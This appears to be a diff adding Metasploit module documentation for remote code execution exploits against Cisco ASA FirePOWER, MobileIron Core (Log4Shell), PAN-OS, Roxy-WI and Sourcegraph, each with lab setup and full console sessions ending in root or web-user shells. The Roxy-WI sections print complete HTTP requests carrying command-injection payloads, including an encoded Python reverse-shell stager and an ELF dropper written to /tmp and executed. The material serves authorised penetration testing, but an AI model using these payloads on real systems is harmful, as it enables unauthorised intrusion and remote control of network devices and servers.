+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.21:43056 ) at 2022-04-21 12:49:15 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a Meterpreter shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.2:8080/FeB2t5vKpa
+[*] Client 10.0.0.21 (curl/7.48.0) requested /FeB2t5vKpa
+[*] Sending payload to 10.0.0.21 (curl/7.48.0)
+[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.21:43058 ) at 2022-04-21 12:51:44 -0700
+[*] Command Stager progress - 100.00% done (111/111 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 6315 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+### Description
+MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
+will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
+command execution in the context of the tomcat user.
+
+This module will start an LDAP server that the target will need to connect to.
+
+### Setup
+Once MobileIron Core is installed, no configuration needs to take place. The application is vulnerable out of the box.
+
+### MobileIron Core Appliance ISO Installation on VMWare Fusion
+
+1. Obtain a `mobileiron-##.#.#.#-##.iso` file, the following steps utilize `mobileiron-10.6.0.0-23.iso`.
+2. Use the ISO to create "A New Virtual Machine".
+3. Customize the VM settings to your liking. I gave the VM 4gb RAM, 4 cores, and changed the network adapter to a bridged mode
+so that I can hit it over the network.
+4. Boot the new virtual machine.
+5. Type `vm-install` at the `boot:` prompt.
+6. Wait patiently while the VM reboots and begins the install process. The system *will* reboot when installation completes.
+7. When prompted with `Continue with configuration dialog?`, type `yes`
+8. Type `q` to clear the license from the screen.
+9. Accept the End User License Agreement by typing `yes`
+10. Enter a Company Name / contact / email of your choosing. They don't matter.
+11. Configure an enable password (e.g. `Labpass1`)
+12. Enter an admin user name (e.g. `albinolobster`)
+13. Enter and confirm an admin password (e.g. `Labpass1`)
+14. Select `a` for the management interface
+15. Assign a static IP address and network mask that works with your test network. (e.g. `10.9.49.101` and `255.255.255.0`)
+16. Enter your test networks default gateway (e.g. `10.9.49.1`)
+17. Enter a fully-qualified domain name for the device (e.g. `lobster.example.com`). Unfortunately, this needs to work. I added a
+static DNS enty to my lab network's router.
+18. Enter your desired name server. My lab network relies on the aforementioned router (e.g. `10.9.49.1`)
+19. Enter blank entries for name server 2 and 3.
+20. `yes` to enable remote shell access (why not, right?)
+21. `no` to configuring NTP
+22. `no` to configuring system clock
+23. `yes` to commit changes
+24. Type `reload` to restart the system and `yes`, when prompted, to both saving the configuration and proceeding with the reload
+25. When the system has restarted, you should now have a vulnerable install of MobileIron Core.
+26. Visit `https://ipaddr` to ensure the HTTP server has fully loaded
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/mobileiron_core_log4shell`
+3. Set the `RHOSTS`, `LHOST`, and `SRVHOST`
+4. Do: `run`
+5. If the target is vulnerable, the payload should be executed
+
+## Options
+
+## Scenarios
+
+### MobileIron Core 11.2.0.0-31
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.100
+RHOSTS => 10.9.49.100
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.100:48004) at 2022-07-29 09:46:14 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux hackercat.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### MobileIron Core 10.6.0.0-23
+
+```
+msf6 > use exploit/linux/http/mobileiron_core_log4shell
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set LHOST 10.9.49.248
+LHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVHOST 10.9.49.248
+SRVHOST => 10.9.49.248
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set SRVPORT 1389
+SRVPORT => 1389
+msf6 exploit(linux/http/mobileiron_core_log4shell) > set RHOSTS 10.9.49.101
+RHOSTS => 10.9.49.101
+msf6 exploit(linux/http/mobileiron_core_log4shell) > run
+
+[*] Started reverse TCP handler on 10.9.49.248:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Command shell session 1 opened (10.9.49.248:4444 -> 10.9.49.101:35304) at 2022-07-29 10:19:58 -0700
+[*] Server stopped.
+
+id
+uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)
+uname -a
+Linux lobster.example.com 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 10.9.49.101 - Command shell session 1 closed.
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits CVE-2020-2038, an authenticated OS Command Injection vulnerability in PAN-OS versions < 10.0.1,
+< 9.1.4 and <9.0.10 that allows authenticated administrators to execute arbitrary OS commands with root privileges. The
+Rest API allows authenticated users to send operational mode commands via the "op" request. Insufficient filtering of
+user inputs in the "op" request allows an attacker to inject commands.
+
+A Palo Alto Firewall demo VM can be requested at the following
+[link](https://www.paloaltonetworks.com/company/request-demo). PAN‑OS is the software that runs all Palo Alto Networks
+next-generation firewalls. PAN-OS will be running on the VM by default. The only setup necessary should be setting the
+administrator password.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/panos_auth_rce`
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### PAN-OS 10.0.0
+```
+msf6 > use linux/http/panos_auth_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
+rhosts => 192.168.2.196
+msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
+PASSWORD => N0tpassword!
+msf6 exploit(linux/http/panos_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.114:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating...
+[+] Successfully obtained api key
+[+] The target is vulnerable.
+[*] Exploiting...
+[*] Sending stage (989032 bytes) to 192.168.2.196
+[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:52592) at 2022-08-17 16:13:19 -0400
+[*] Command Stager progress - 100.00% done (1111/1111 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : PA-VM-10-0-0.home
+OS           : Red Hat  (Linux 3.10.0-957.21.3.10.pan.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,392 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0.
+Successful exploitation results in remote code execution under the context of the web server user.
+
+Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
+
+### Setup
+
+Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
+
+First grab a vulnerable copy of the code from the release pages at https://github.com/hap-wi/roxy-wi/releases.
+You will likely want to grab version 6.1.0.0 from https://github.com/hap-wi/roxy-wi/archive/refs/tags/v6.1.0.0.tar.gz
+
+Next follow the installation instructions at https://roxy-wi.org/installation.py#manual and be sure to replace `apache`
+with `www-data` where applicable if your using Debian or Ubuntu (they call this out in their instructions however
+it can be a bit hard to find which is why I'm noting it here).
+
+Once you are done you should have a working copy of Roxy-Wi. Note that for some reason the login page didn't work for me
+in testing, however everything needed to test this module should be set up and operating as expected.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/roxy_wi_exec`
+4. Set `RHOST` to the address of the target Roxy-WI machine.
+5. Set `LHOST` to the address of your attacking machine.
+8. Run `exploit`
+9. Do: `run`
+10. You should get a shell as the user running the Roxy-WI server.
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path to Roxy-WI. The default value is `/`.
+
+## Scenarios
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Unix In-Memory Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=iufmgha&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 18:46:55 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 760
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20echo%20exec\%28__import__\%28\%27base64\%27\%29.b64decode\%28__import__\%28\%27codecs\%27\%29.getencoder\%28\%27utf-8\%27\%29\%28\%27aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yMi4yMzAuMTQ1Jyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc%2bSScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK\%27\%29\%5b0\%5d\%29\%29%20%7c%20exec%20%24%28which%20python%20%7c%7c%20which%20python3%20%7c%7c%20which%20python2%29%20-%20%3b%23&alert_consumer=gumovpt&backend_server=127.0.0.1
+    [*] Sending stage (40164 bytes) to 172.22.230.145
+    [*] Meterpreter session 1 opened (172.22.230.145:4444 -> 172.22.230.145:41506) at 2022-07-25 13:46:56 -0500
+    ####################
+    # Response:
+    ####################
+    No response received
+    
+    meterpreter > getuid
+    Server username: www-data
+    meterpreter > sysinfo
+    Computer     : gwillcox-Virtual-Machine
+    OS           : Linux 5.15.0-41-generic #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022
+    Architecture : x64
+    Meterpreter  : python/linux
+    meterpreter > pwd
+    /var/www/haproxy-wi/app
+    meterpreter > ls
+    Listing: /var/www/haproxy-wi/app
+    ================================
+    
+    Mode              Size    Type  Last modified              Name
+    ----              ----    ----  -------------              ----
+    100664/rw-rw-r--  83      fil   2022-06-30 02:43:57 -0500  .htaccess
+    040755/rwxr-xr-x  4096    dir   2022-07-25 13:36:33 -0500  __pycache__
+    100775/rwxrwxr-x  12822   fil   2022-06-30 02:43:57 -0500  add.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  certs
+    100775/rwxrwxr-x  4745    fil   2022-06-30 02:43:57 -0500  config.py
+    100775/rwxrwxr-x  33194   fil   2022-06-30 02:43:57 -0500  create_db.py
+    100775/rwxrwxr-x  14945   fil   2022-06-30 02:43:57 -0500  db_model.py
+    100775/rwxrwxr-x  64688   fil   2022-06-30 02:43:57 -0500  funct.py
+    100775/rwxrwxr-x  913     fil   2022-06-30 02:43:57 -0500  ha.py
+    100775/rwxrwxr-x  8544    fil   2022-06-30 02:43:57 -0500  hapservers.py
+    100775/rwxrwxr-x  3008    fil   2022-06-30 02:43:57 -0500  history.py
+    100775/rwxrwxr-x  7145    fil   2022-06-30 02:43:57 -0500  login.py
+    100775/rwxrwxr-x  1696    fil   2022-06-30 02:43:57 -0500  logs.py
+    100775/rwxrwxr-x  1598    fil   2022-06-30 02:43:57 -0500  metrics.py
+    100775/rwxrwxr-x  966     fil   2022-06-30 02:43:57 -0500  nettools.py
+    100775/rwxrwxr-x  181104  fil   2022-06-30 02:43:57 -0500  options.py
+    100775/rwxrwxr-x  4096    fil   2022-06-30 02:43:57 -0500  overview.py
+    100775/rwxrwxr-x  1884    fil   2022-06-30 02:43:57 -0500  portscanner.py
+    100775/rwxrwxr-x  1125    fil   2022-06-30 02:43:57 -0500  provisioning.py
+    100644/rw-r--r--  274432  fil   2022-07-25 13:41:13 -0500  roxy-wi.db
+    100775/rwxrwxr-x  750     fil   2022-06-30 02:43:57 -0500  runtimeapi.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  scripts
+    100775/rwxrwxr-x  2486    fil   2022-06-30 02:43:57 -0500  sections.py
+    100775/rwxrwxr-x  1580    fil   2022-06-30 02:43:57 -0500  servers.py
+    100775/rwxrwxr-x  1826    fil   2022-06-30 02:43:57 -0500  smon.py
+    100775/rwxrwxr-x  103924  fil   2022-06-30 02:43:57 -0500  sql.py
+    040775/rwxrwxr-x  4096    dir   2022-06-30 02:43:57 -0500  templates
+    100775/rwxrwxr-x  1361    fil   2022-06-30 02:43:57 -0500  users.py
+    100775/rwxrwxr-x  4150    fil   2022-06-30 02:43:57 -0500  versions.py
+    100775/rwxrwxr-x  2076    fil   2022-06-30 02:43:57 -0500  viewlogs.py
+    100775/rwxrwxr-x  1150    fil   2022-06-30 02:43:57 -0500  viewsttats.py
+    100775/rwxrwxr-x  1819    fil   2022-06-30 02:43:57 -0500  waf.py
+    
+    meterpreter > 
+```
+
+### Roxy-WI 6.1.0.0 Ubuntu 22.04 GNU/Linux (x86_64) - Apache/2.4.52 / Python 3.10.4 / MySQL 8.0.29 With Linux Dropper Target
+
+```
+    msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/http/roxy_wi_exec 
+    [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Unix (In-Memory)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 127.0.0.1
+    RHOST => 127.0.0.1
+    msf6 exploit(linux/http/roxy_wi_exec) > set HttpTrace true
+    HttpTrace => true
+    msf6 exploit(linux/http/roxy_wi_exec) > set Target 1 
+    Target => 1
+    msf6 exploit(linux/http/roxy_wi_exec) > set payload linux/x64/shell/reverse_tcp 
+    payload => linux/x64/shell/reverse_tcp
+    msf6 exploit(linux/http/roxy_wi_exec) > show options
+    
+    Module options (exploit/linux/http/roxy_wi_exec):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                             t:port][...]
+       RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid
+                                             7/metasploit-framework/wiki/Using-Metasploit
+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (linux/x64/shell/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       1   Linux (Dropper)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 19:07:53 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 939
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
+    [*] Sending stage (38 bytes) to 172.22.230.145
+    [*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
+    i####################
+    # Response:
+    ####################
+    No response received
+    d[*] Command Stager progress - 100.00% done (810/810 bytes)
+    
+    id
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    whoami
+    www-data
+    pwd
+    /var/www/haproxy-wi/app
+    ls
+    __pycache__
+    add.py
+    certs
+    config.py
+    create_db.py
+    db_model.py
+    funct.py
+    ha.py
+    hapservers.py
+    history.py
+    login.py
+    logs.py
+    metrics.py
+    nettools.py
+    options.py
+    overview.py
+    portscanner.py
+    provisioning.py
+    roxy-wi.db
+    runtimeapi.py
+    scripts
+    sections.py
+    servers.py
+    smon.py
+    sql.py
+    templates
+    users.py
+    versions.py
+    viewlogs.py
+    viewsttats.py
+    waf.py
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+commands that are able to be executed through the git exec REST API.
+
+The cloned repositories can be enumerated from the `/list` endpoint using the curl command:
+`curl http://$target:3178/list?cloned=true`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application (see detailed Docker Installation section below)
+2. Start msfconsole
+3. Do: `use exploits/linux/http/sourcegraph_gitserver_sshcmd`
+4. Set the `RHOSTS`, `PAYLOAD` and any payload related options that are necessary
+5. Do: `run`
+
+### Docker Installation
+1. Run the following command to start the all-inclusive docker container for Sourcegraph v3.36.3.
+
+    ```
+    docker run \
+      --publish 3178:3178 \
+      --publish 7080:7080 \
+      --publish 127.0.0.1:3370:3370 \
+      --rm \
+      --volume /tmp/sourcegraph/config:/etc/sourcegraph \
+      --volume /tmp/sourcegraph/data:/var/opt/sourcegraph \
+      sourcegraph/server:3.36.3
+    ```
+2. Once the service has started, navigate to the webinterface at http://localhost:7080
+3. When prompted, create an administrator's account
+4. At least one git repository must be added, complete the following steps to add one.
+    1. Navigate to `Repositories > Managed code hosts`
+    2. Select "Generic Git host"
+    3. When prompted, use the following example JSON code to clone Metasploit.
+
+        ```
+        {
+          "url": "https://github.com/",
+          "repos": [
+            "rapid7/metasploit-framework.git"
+          ]
+        }
+       ```
+
+## Options
+
+### EXISTING_REPO
+
+An existing, cloned repository. If this value is not set, a random one will be selected from the server.
+
+## Scenarios
+
+### Docker v3.36.3
+
+```
+msf6 > use exploit/linux/http/sourcegraph_gitserver_sshcmd
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
